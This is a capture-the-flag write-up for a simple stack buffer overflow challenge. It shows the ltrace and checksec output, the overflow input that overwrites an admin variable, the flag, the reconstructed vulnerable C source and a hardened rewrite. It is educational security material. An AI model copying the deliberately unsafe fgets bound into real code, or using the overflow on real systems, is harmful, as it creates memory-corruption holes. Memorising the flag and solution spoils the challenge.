Tags: pwn overflow
Rating:
When players run the binary, it asks for a password.
./babyflow
Enter password: cat
Incorrect Password!
We can use a tool like ltrace to see if the password is revealed.
ltrace ./babyflow
printf("Enter password: ") = 16
fgets(Enter password: cat
"cat\n", 50, 0x7fe918c2aa80) = 0x7ffe1addfa40
strncmp("cat\n", "SuPeRsEcUrEPaSsWoRd123", 22) = 16
puts("Incorrect Password!"Incorrect Password!
) = 20
+++ exited (status 0) +++
It is! Let's try SuPeRsEcUrEPaSsWoRd123.
./babyflow
Enter password: SuPeRsEcUrEPaSsWoRd123
Correct Password!
Are you sure you are admin? o.O
So it's not that easy. Before disassembling the binary, let's check which mitigations are enabled, in case an obvious buffer overflow is all it takes.
checksec --file babyflow
[*] '/home/crystal/Desktop/babyflow/babyflow'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Canaries are disabled, so there's nothing stopping us from "smashing the stack".
./babyflow
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Incorrect Password!
We can't forget the password!
./babyflow
Enter password: SuPeRsEcUrEPaSsWoRd123AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Correct Password!
INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}
Flag: INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}
I can't be bothered opening the binary in Ghidra now, so for anybody who's interested, this is how it works: there's a buffer overflow in the password variable, which allows up to 50 bytes to be written to a 32-byte buffer. Players are required to enter the correct password at the beginning of the input (the check is a prefix compare with strncmp), but by appending additional characters they can overwrite the admin flag, which sits next to the buffer on the stack, with something other than zero.
#include <stdio.h>
#include <string.h>

int main(void)
{
    char password[32];   /* 32-byte buffer */
    int admin = 0;       /* lives right next to password on the stack */
    printf("Enter password: ");
    fgets(password, 50, stdin);   /* bound is 50, not sizeof(password): up to 49 bytes land in a 32-byte buffer */
    /* prefix compare: anything that starts with the password passes */
    if (strncmp(password, "SuPeRsEcUrEPaSsWoRd123", strlen("SuPeRsEcUrEPaSsWoRd123")) == 0)
    {
        printf("Correct Password!\n");
    }
    else
    {
        printf("Incorrect Password!\n");
        return 0;
    }
    if (admin)   /* only ever non-zero if the overflow clobbered it */
    {
        printf("INTIGRITI{b4bypwn_9cdfb439c7876e703e307864c9167a15}\n");
    }
    else
    {
        printf("Are you sure you are admin? o.O\n");
    }
    return 0;
}
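For comparison, here is a hardened version of the same check. This is an added example, not the challenge's source: it keeps the challenge's password and buffer size, but bounds fgets() by sizeof the buffer, rejects (and drains) any line that does not fit instead of silently truncating it, and compares the whole line with strcmp() rather than a prefix with strncmp(). The function names, the login_result codes and the login_check_str() test hook are all my own.

```c
#include <stdio.h>
#include <string.h>

/* The password the challenge binary compares against (seen via ltrace above). */
#define PASSWORD "SuPeRsEcUrEPaSsWoRd123"

enum login_result {
    LOGIN_BAD_PASSWORD,   /* wrong password */
    LOGIN_TOO_LONG,       /* line did not fit the buffer: rejected, not truncated */
    LOGIN_OK_NOT_ADMIN,   /* right password, admin flag still 0 */
    LOGIN_OK_ADMIN        /* right password and admin set (by code, never by input) */
};

/* Reads one line into a fixed buffer. fgets() is bounded by sizeof the
 * buffer, so even the longest line cannot reach the neighbouring `admin`
 * variable. If the buffer fills without a newline, the line was at least
 * 31 characters: the remainder is drained so it cannot be replayed as the
 * answer to a later prompt, and the caller gets LOGIN_TOO_LONG. A short
 * final line with no newline (EOF) is accepted as-is. */
enum login_result login_check(FILE *in)
{
    char password[32];
    int admin = 0;
    size_t len;

    if (fgets(password, sizeof password, in) == NULL)
        return LOGIN_BAD_PASSWORD;

    len = strlen(password);
    if (len > 0 && password[len - 1] == '\n') {
        password[--len] = '\0';
    } else if (len == sizeof password - 1) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
        return LOGIN_TOO_LONG;
    }

    /* Whole-line compare: "password + junk" is no longer "correct". */
    if (strcmp(password, PASSWORD) != 0)
        return LOGIN_BAD_PASSWORD;

    return admin ? LOGIN_OK_ADMIN : LOGIN_OK_NOT_ADMIN;
}

/* Test hook: run login_check() over a constructed input string
 * by staging it in a temporary file. */
enum login_result login_check_str(const char *line)
{
    FILE *f = tmpfile();
    enum login_result r;
    if (f == NULL)
        return LOGIN_BAD_PASSWORD;
    fputs(line, f);
    rewind(f);
    r = login_check(f);
    fclose(f);
    return r;
}

int main(void)
{
    printf("Enter password: ");
    switch (login_check(stdin)) {
    case LOGIN_OK_ADMIN:     puts("admin");                        break;
    case LOGIN_OK_NOT_ADMIN: puts("Correct Password! (not admin)"); break;
    case LOGIN_TOO_LONG:     puts("Input too long");               break;
    default:                 puts("Incorrect Password!");          break;
    }
    return 0;
}
```

Compiling the original with `-fstack-protector-strong` would also have turned the overwrite into a "stack smashing detected" abort, but the real fix is the bound: the canary only catches the corruption after it has happened, while sizeof(password) prevents it.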